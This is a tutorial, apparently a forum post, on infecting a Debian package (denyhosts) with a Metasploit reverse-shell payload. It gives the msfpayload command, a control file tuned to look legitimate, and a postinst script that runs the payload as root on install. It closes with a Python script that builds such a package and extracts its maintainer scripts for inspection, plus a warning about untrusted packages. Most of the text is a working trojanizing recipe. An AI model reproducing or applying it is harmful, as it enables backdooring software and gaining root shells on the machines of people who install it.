Fun with Linux payloads and Linux packages


Hackers For Charity

Just thought I should write a small tutorial on infecting .debs or .rpms with Linux payloads.

First, download the package you are going to infect. For this test case I am going to use the denyhosts package; it is a simple package that blocks hosts after repeated failed SSH logins. From a console, type

apt-get install denyhosts

Then navigate to /var/cache/apt/archives/ on the BackTrack 4 machine and copy the denyhosts .deb package to another location for modification. In the new location, extract the contents of the package by typing

dpkg -x denyhosts_2.6-5_all.deb test

This will create a folder called test with the contents of the package. A simple ls reveals the following folders:
etc usr var workdir

Go to msfpayload and generate your payload. On BackTrack 4 I prefer linux/x86/shell/reverse_tcp. On the console, type the following, with LHOST set to the address of the machine that will run the handler:

/pentest/exploits/framework3/msfpayload linux/x86/shell/reverse_tcp LHOST= LPORT=4444 X > linux_payload

This creates an ELF executable called linux_payload in the current directory.

Inside test, create a folder called DEBIAN, and in that folder create two files: control and postinst. dpkg -x only unpacks the installed file tree, so the control directory has to be recreated, and dpkg-deb --build expects it at test/DEBIAN. The control file defines the package. My control file looks like the one below (note that 2.2 is lower than the 2.6-5 of the original package; dpkg -i still installs it, with a downgrade warning, but reusing the original version string is less conspicuous).

Package: denyhosts
Version: 2.2
Section: system
Priority: optional
Architecture: i386
Maintainer: Ubuntu developers
Description: Denyhosts

Make the postinst file executable (chmod 755 postinst). It should run the payload from the path the payload will be installed to. dpkg runs this script as root at the end of installation, which is what gives the reverse shell root privileges. My postinst file looks like this.

#!/bin/sh
# runs as root during dpkg -i; 2755 also sets the setgid bit, plain 755 would do
chmod 2755 /usr/share/denyhosts/linux_payload && /usr/share/denyhosts/linux_payload &

For this to work, copy your payload (linux_payload) into the extracted folder at test/usr/share/denyhosts/. The path must match the one postinst executes.

Now we are ready to build the Debian package. From a console, type the following

dpkg-deb --build test

This creates the malicious package as test.deb in the current directory (next to the test folder, not inside it). Start exploit/multi/handler with the same payload, LHOST and LPORT to handle your sessions. Scp the Debian package to another machine and install it with the usual dpkg -i [package_name]. As soon as the package is installed, you should receive a reverse shell on your machine, running as root, because dpkg executed postinst as root.
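As an added example (not the post's code), the script below does by hand what dpkg-deb --build does to the test folder, so the shape of the thing being shipped is visible: a .deb is an ar archive holding debian-binary, control.tar.gz (the DEBIAN directory with control and the maintainer scripts) and data.tar.gz (everything else). It then implements the check a recipient should run before dpkg -i executes those scripts as root: pull the maintainer scripts out of the package and read them. The package tree, the control fields and a one-line stand-in for the payload are constructed inline; a real msfpayload ELF would be dropped in the same place.

```python
"""Hand-build a .deb the way `dpkg-deb --build test` does, then read its
maintainer scripts back out before anyone runs `dpkg -i` on it. Added
example, not the post's code; tree, control fields and payload are constructed."""
import io
import os
import tarfile
import tempfile

AR_MAGIC = b"!<arch>\n"
SCRIPTS = ("preinst", "postinst", "prerm", "postrm")


def _ar_member(name: str, data: bytes) -> bytes:
    """One ar(1) member: fixed 60-byte header, data, newline pad to even size."""
    hdr = (name.ljust(16) + "0".ljust(12) + "0".ljust(6) + "0".ljust(6)
           + "100644".ljust(8) + str(len(data)).ljust(10) + "`\n").encode()
    return hdr + data + (b"\n" if len(data) % 2 else b"")


def _tar_gz(root: str, skip=()) -> bytes:
    """gzip tar of root's entries, stored as ./name like dpkg-deb writes them."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for entry in sorted(os.listdir(root)):
            if entry not in skip:
                tf.add(os.path.join(root, entry), arcname="./" + entry)
    return buf.getvalue()


def build_deb(tree: str, out_path: str) -> str:
    """A .deb is an ar archive of debian-binary, control.tar.gz (the DEBIAN/
    dir: control + maintainer scripts) and data.tar.gz (everything else)."""
    control = _tar_gz(os.path.join(tree, "DEBIAN"))
    data = _tar_gz(tree, skip=("DEBIAN",))
    with open(out_path, "wb") as f:
        f.write(AR_MAGIC)
        f.write(_ar_member("debian-binary", b"2.0\n"))
        f.write(_ar_member("control.tar.gz", control))
        f.write(_ar_member("data.tar.gz", data))
    return out_path


def read_ar(path: str) -> dict:
    """Parse the ar container into {member name: bytes}."""
    with open(path, "rb") as f:
        blob = f.read()
    if not blob.startswith(AR_MAGIC):
        raise ValueError("not an ar archive, so not a .deb")
    pos, members = len(AR_MAGIC), {}
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]
        name = hdr[0:16].decode().strip().rstrip("/")   # GNU ar appends '/'
        size = int(hdr[48:58].decode().strip())
        members[name] = blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)                   # skip the pad byte
    return members


def maintainer_scripts(deb_path: str) -> dict:
    """{script: (mode, text)} for the hooks dpkg runs as root at install time.
    This is the check to do before `dpkg -i` on a package you did not build;
    mode "r:*" reads control.tar.gz and control.tar.xz alike."""
    members = read_ar(deb_path)
    ctrl = next(n for n in members if n.startswith("control.tar"))
    found = {}
    with tarfile.open(fileobj=io.BytesIO(members[ctrl]), mode="r:*") as tf:
        for m in tf.getmembers():
            base = os.path.basename(m.name)
            if m.isfile() and base in SCRIPTS:
                found[base] = (m.mode & 0o7777, tf.extractfile(m).read().decode())
    return found


def make_demo_tree(root: str) -> str:
    """Constructed stand-in for the post's `test` dir: same control and
    postinst as the post, and a shell one-liner instead of a real payload ELF."""
    payload_dir = os.path.join(root, "usr", "share", "denyhosts")
    os.makedirs(payload_dir)
    with open(os.path.join(payload_dir, "linux_payload"), "w") as f:
        f.write("#!/bin/sh\necho payload-stand-in\n")
    debian = os.path.join(root, "DEBIAN")
    os.makedirs(debian)
    with open(os.path.join(debian, "control"), "w") as f:
        f.write("Package: denyhosts\nVersion: 2.2\nSection: system\n"
                "Priority: optional\nArchitecture: i386\n"
                "Maintainer: Ubuntu developers\nDescription: Denyhosts\n")
    postinst = os.path.join(debian, "postinst")
    with open(postinst, "w") as f:
        f.write("#!/bin/sh\nchmod 2755 /usr/share/denyhosts/linux_payload && "
                "/usr/share/denyhosts/linux_payload &\n")
    os.chmod(postinst, 0o755)   # dpkg-deb --build rejects non-executable scripts
    return root


def demo() -> dict:
    """Build test.deb from the demo tree and return its maintainer scripts."""
    with tempfile.TemporaryDirectory() as tmp:
        tree = make_demo_tree(os.path.join(tmp, "test"))
        deb = build_deb(tree, os.path.join(tmp, "test.deb"))
        return maintainer_scripts(deb)


if __name__ == "__main__":
    for name, (mode, text) in demo().items():
        print(f"== {name} (mode {mode:o}) ==\n{text}")
```

Running the script prints the postinst exactly as it will be executed by dpkg, which is the point: nothing in dpkg -i checks a signature or asks before running it. maintainer_scripts() is the function to point at any .deb that arrives outside a signed apt repository; a package whose postinst launches something from /usr/share in the background is the thing to look for.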

I don't have any RPM-based system at the moment but hope somebody tries it out.
Lesson: don't install packages from people you don't trust. dpkg -i performs no signature check of its own; apt's verification covers repository metadata, not a .deb handed to you directly. At a minimum, read the maintainer scripts first (dpkg-deb -e package.deb ctrl extracts them) before they run as root.

Happy hacking.
